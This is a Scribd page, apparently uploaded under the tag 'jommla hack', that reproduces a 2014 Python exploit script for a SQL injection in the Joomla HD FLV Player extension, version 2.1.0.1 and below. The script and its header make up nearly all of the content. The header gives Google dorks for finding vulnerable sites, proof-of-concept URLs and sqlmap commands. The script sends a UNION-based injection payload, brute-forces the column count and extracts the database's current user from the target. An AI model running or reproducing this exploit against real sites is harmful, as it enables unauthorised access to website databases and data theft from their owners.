Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • j00m HD FLV SQL Injection - Py

    Încărcat de

    Zeljko Panovic
    109 vizualizări4 pagini
    jommla hack

    Titlu original

    j00m Hd Flv SQL Injection.py

    Drepturi de autor

    © © All Rights Reserved

    Formate disponibile

    TXT, PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document
    jommla hack

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca TXT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    109 vizualizări4 pagini

    j00m HD FLV SQL Injection - Py

    Încărcat de

    Zeljko Panovic
    jommla hack

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca TXT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 4

    #!

    /usr/bin/python
    #
    # Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection
    #
    # Exploit Author : Claudio Viviani
    #
    # Vendor Homepage : http://www.hdflvplayer.net/
    #
    # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
    #
    # Dork google 1: inurl:/component/hdflvplayer/
    # Dork google 2: inurl:com_hdflvplayer
    #
    # Date : 2014-11-11
    #
    # Tested on : BackBox 3.x/4.x
    #
    # Info: The variable "id" is not sanitized (again)
    # Over 80.000 downloads (statistic reported on official site)
    #
    #
    # Video Demo: http://youtu.be/-EdOQSjAhW8
    #
    # Poc:
    # http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
    # http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-ble
    blo/id/6 [SQLi]/page/1 (url rewrite)
    #
    # Poc sqlmap:
    # sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id
    =1" -p id --dbms mysql
    # sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182
    /title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
    #
    # http connection
    import urllib, urllib2
    # string manipulation
    import re
    # Errors management
    import sys
    # Args management
    import optparse
    # Check url
    def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
    else:
    return url
    banner = """
    _______ __ ___ ___ ______
    | _ .-----.-----.--------| .---.-. | Y | _ \
    |___| | _ | _ | | | _ | |. 1 |. | \
    |. | |_____|_____|__|__|__|__|___._| |. _ |. | \
    |: 1 | |: | |: 1 /
    |::.. . | |::.|:. |::.. . /
    `-------' `--- ---`------'
    _______ ___ ___ ___ _______ __
    | _ | | | Y | | _ | .---.-.--.--.-----.----.
    |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
    |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
    |: | |: 1 |: 1 | |: | |_____|
    |::.| |::.. . |\:.. ./ |::.|
    `---' `-------' `---' `---'
    <= 2.1.0.1 Sql Injection
    Written by:
    Claudio Viviani
    http://www.homelab.it
    info@homelab.it
    homelabit@protonmail.ch
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    """
    commandList = optparse.OptionParser('usage: %prog -t URL')
    commandList.add_option('-t', '--target', action="store",
    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
    )
    options, remainder = commandList.parse_args()
    # Check args
    if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
    host = checkurl(options.target)
    checkext = 0
    evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%2
    0CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%
    29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=
    [SQLi]' }
    char = "%2CNULL"
    endurl = "%2CNULL%23"
    bar = "#"
    print(banner)
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
    sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
    try:
    req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexm
    l', None, headers)
    response = urllib2.urlopen(req).readlines()
    for line_version in response:
    if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") ==
    -1:
    checkext += 1
    else:
    checkext += 0
    if checkext > 0:
    sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
    else:
    sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
    sys.exit(1)
    except urllib2.HTTPError:
    sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
    sys.exit(1)
    except urllib2.URLError as e:
    print("\n[X] Connection Error: "+str(e.code))
    sys.exit(1)
    print("")
    sys.stdout.write("\r[+] Checking Version: ")
    try:
    req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', No
    ne, headers)
    response = urllib2.urlopen(req).readlines()
    for line_version in response:
    if not line_version.find("<version>") == -1:
    VER = re.compile('>(.*?)<').search(line_version).group(1)
    sys.stdout.write("\r[+] Checking Version: "+str(VER))
    except urllib2.HTTPError:
    sys.stdout.write("\r[+] Checking Version: Unknown")
    except urllib2.URLError as e:
    print("\n[X] Connection Error: "+str(e.code))
    sys.exit(1)
    print("")
    for exploiting, dork in evilurl.iteritems():
    s = ""
    barcount = ""
    for a in range(1,100):
    s += char
    try:
    req = urllib2.Request(host+exploiting+s+endurl, None, headers)
    response = urllib2.urlopen(req).read()
    if "h0m3l4b1t" in response:
    print "\n[!] VULNERABLE"
    current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response
    ).group(1)
    print "[*] Username: "+str(current_user)
    print ""
    print "[*] 3v1l Url: "+host+exploiting+s+endurl
    sys.exit(0)
    except urllib2.HTTPError as e:
    response = e.read()
    if "h0m3l4b1t" in response:
    print "\n[!] VULNERABLE"
    current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response
    ).group(1)
    print "[*] Username: "+str(current_user)
    print ""
    print "[*] 3v1l Url: "+host+exploiting+s+endurl
    sys.exit(0)
    except urllib2.URLError as e:
    print("\n[X] Connection Error: "+str(e.code))
    sys.exit(1)
    barcount += bar
    sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
    sys.stdout.flush()
    print "\n[X] Not vulnerable :("
    print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflv
    player&id=1 (valid id number)"

    S-ar putea să vă placă și